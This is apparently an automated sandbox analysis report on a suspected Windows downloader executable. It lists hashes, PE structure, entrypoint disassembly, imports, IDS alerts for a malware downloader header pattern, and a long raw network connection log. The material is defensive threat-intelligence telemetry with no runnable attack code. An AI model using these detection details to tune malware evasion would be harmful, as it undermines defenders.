                                                                                                  SHA512:d2da4f4ce1d26aca8e497e0d889d34ce9a4ec06b50245eb29a1feb7c7c20fce281e0dbefa37d234230163ebeaa602f1a49edee312024628387d2759896434a3c
                                                                                                  SSDEEP:24576:ynE9Wlvj9UENDYuRe5In2hINGct2YBD9w254CQ+K1Q:yEiJUTOn2hINGctTDOBC7
                                                                                                  TLSH:FA25234B7BDCE017C1868E362A67C639D975AC182929874B3B31BF2F6A343D56D18384
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................^...*.......1.......p....@
                                                                                                  Icon Hash:b8333351accc5531
                                                                                                  Entrypoint:0x4031ff
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x536FD795 [Sun May 11 20:03:33 2014 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:7ed0d71376e55d58ab36dc7d3ffda898
                                                                                                  Instruction
                                                                                                  sub esp, 000002D4h
                                                                                                  push ebx
                                                                                                  push ebp
                                                                                                  push esi
                                                                                                  push edi
                                                                                                  push 00000020h
                                                                                                  xor ebp, ebp
                                                                                                  pop esi
                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                  mov dword ptr [esp+10h], 004092D8h
                                                                                                  mov dword ptr [esp+1Ch], ebp
                                                                                                  call dword ptr [00407034h]
                                                                                                  push 00008001h
                                                                                                  call dword ptr [00407134h]
                                                                                                  push ebp
                                                                                                  call dword ptr [004072ACh]
                                                                                                  push 00000008h
                                                                                                  mov dword ptr [00429258h], eax
                                                                                                  call 00007F44588C3644h
                                                                                                  mov dword ptr [004291A4h], eax
                                                                                                  push ebp
                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                  push 000002B4h
                                                                                                  push eax
                                                                                                  push ebp
                                                                                                  push 00420658h
                                                                                                  call dword ptr [0040717Ch]
                                                                                                  push 004092C0h
                                                                                                  push 004281A0h
                                                                                                  call 00007F44588C32AFh
                                                                                                  call dword ptr [00407138h]
                                                                                                  mov ebx, 00434000h
                                                                                                  push eax
                                                                                                  push ebx
                                                                                                  call 00007F44588C329Dh
                                                                                                  push ebp
                                                                                                  call dword ptr [0040710Ch]
                                                                                                  cmp word ptr [00434000h], 0022h
                                                                                                  mov dword ptr [004291A0h], eax
                                                                                                  mov eax, ebx
                                                                                                  jne 00007F44588C07AAh
                                                                                                  push 00000022h
                                                                                                  mov eax, 00434002h
                                                                                                  pop esi
                                                                                                  push esi
                                                                                                  push eax
                                                                                                  call 00007F44588C2CEEh
                                                                                                  push eax
                                                                                                  call dword ptr [00407240h]
                                                                                                  mov dword ptr [esp+18h], eax
                                                                                                  jmp 00007F44588C086Eh
                                                                                                  push 00000020h
                                                                                                  pop edx
                                                                                                  cmp cx, dx
                                                                                                  jne 00007F44588C07A9h
                                                                                                  inc eax
                                                                                                  inc eax
                                                                                                  cmp word ptr [eax], dx
                                                                                                  je 00007F44588C079Bh
                                                                                                  add word ptr [eax], 0000h
                                                                                                  Programming Language:
                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x3a210.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x5cf60x5e00eee41166f9daa8eae9e9b5d18d2d3c6eFalse0.6619431515957447data6.441066052438077IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x70000x13540x14002f90a087fd075d2b61c65e6db9ea1417False0.4314453125data5.037502749366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x90000x202980x600eaa9954d4bef1481fc1bddefea6bf878False0.4609375data3.6563423252168445IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .ndata0x2a0000x380000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0x620000x3a2100x3a400f91af9b4d232be8e11695918d7fec713False0.43928547478540775data4.7460567769423365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0x623b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.26944575890216493
                                                                                                  RT_ICON0x72be00xb6acPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.988794799418356
                                                                                                  RT_ICON0x7e2900x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.3126708009249527
                                                                                                  RT_ICON0x877380x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.32300751879699247
                                                                                                  RT_ICON0x8df200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.3179297597042514
                                                                                                  RT_ICON0x933a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.32646433632498817
                                                                                                  RT_ICON0x975d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.36317427385892115
                                                                                                  RT_ICON0x99b780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.40150093808630394
                                                                                                  RT_ICON0x9ac200x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.44426229508196724
                                                                                                  RT_ICON0x9b5a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.48936170212765956
                                                                                                  RT_DIALOG0x9ba100x100dataEnglishUnited States0.5234375
                                                                                                  RT_DIALOG0x9bb100x11cdataEnglishUnited States0.6056338028169014
                                                                                                  RT_DIALOG0x9bc300xc4dataEnglishUnited States0.5918367346938775
                                                                                                  RT_DIALOG0x9bcf80x60dataEnglishUnited States0.7291666666666666
                                                                                                  RT_GROUP_ICON0x9bd580x92dataEnglishUnited States0.7191780821917808
                                                                                                  RT_VERSION0x9bdf00x114dataEnglishUnited States0.6086956521739131
                                                                                                  RT_MANIFEST0x9bf080x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                  USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                  ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                  ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  EnglishUnited States
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-10-28T12:22:28.723071+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736142.250.185.206443TCP
                                                                                                  2024-10-28T12:22:34.997069+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738132.226.247.7380TCP
                                                                                                  2024-10-28T12:22:36.809593+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449738132.226.247.7380TCP
                                                                                                  2024-10-28T12:22:37.535463+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449740188.114.97.3443TCP
                                                                                                  2024-10-28T12:22:38.465929+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449741132.226.247.7380TCP
                                                                                                  2024-10-28T12:22:42.712859+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449746188.114.97.3443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 28, 2024 12:22:27.353827000 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:27.353848934 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:27.353923082 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:27.369138002 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:27.369153023 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.221434116 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.221519947 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.222093105 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.222150087 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.357659101 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.357692957 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.357904911 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.357954979 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.362627983 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.403373957 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.723057985 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.723125935 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.723373890 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.723423958 CET44349736142.250.185.206192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.723473072 CET49736443192.168.2.4142.250.185.206
                                                                                                  Oct 28, 2024 12:22:28.753027916 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:28.753038883 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:28.753093958 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:28.753592014 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:28.753604889 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:29.620399952 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:29.620486975 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:29.624175072 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:29.624183893 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:29.624392986 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:29.624453068 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:29.624921083 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:29.671334028 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:31.948332071 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:31.948461056 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:31.956862926 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:31.956940889 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.067997932 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.068072081 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.068108082 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.068108082 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.068109989 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.068120003 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.068170071 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.068170071 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.068507910 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.068582058 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.068593979 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.068644047 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.072901964 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.072964907 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.072972059 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.073126078 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.081720114 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.081789017 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.081803083 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.081984043 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.090476990 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.090567112 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.090599060 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.090656996 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.099530935 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.099589109 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.099596024 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.099642038 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.108227015 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.108297110 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.108304977 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.108380079 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.116939068 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.116993904 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.117017984 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.117073059 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.125952959 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.126008034 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.126014948 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.126121998 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.187642097 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.187722921 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.187731981 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.187807083 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.187845945 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.187845945 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.187855959 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.187942028 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.188028097 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.188091040 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.188106060 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.188139915 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.188158035 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.188165903 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.188180923 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.188235998 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.188999891 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.189064980 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.189070940 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.189120054 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.189126015 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.189178944 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.189184904 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.189239979 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.192682028 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.192744970 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.192759991 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.192820072 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.192827940 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.192890882 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.192897081 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.192979097 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.201376915 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.201426029 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.201427937 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.201442003 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.201474905 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.201494932 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.204221010 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.204327106 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.204332113 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.204369068 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.210412025 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.210566044 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.210572958 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.210634947 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.215513945 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.215610981 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.215620041 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.215681076 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.221409082 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.221479893 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.221487045 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.221554041 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.226850986 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.226928949 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.226934910 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.226979017 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.232599974 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.232652903 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.232660055 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.232712030 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.238194942 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.238272905 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.238310099 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.238362074 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.244009972 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.244115114 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.244122982 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.244188070 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.249562025 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.249639988 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.249650955 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.249717951 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.255294085 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.255362988 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.255501986 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.255598068 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.260901928 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.260974884 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.307332039 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.307384014 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.307398081 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.307442904 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.307470083 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.307634115 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.307642937 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.307755947 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.307761908 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.307792902 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.307800055 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.307862043 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.308115005 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.308178902 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.308183908 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.308264971 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.308276892 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.308283091 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.308322906 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.308355093 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.308358908 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.308415890 CET49737443192.168.2.4142.250.186.65
                                                                                                  Oct 28, 2024 12:22:32.309195042 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.309267998 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.309304953 CET44349737142.250.186.65192.168.2.4
                                                                                                  Oct 28, 2024 12:22:32.309325933 CET49737443192.168.2.4142.250.186.65
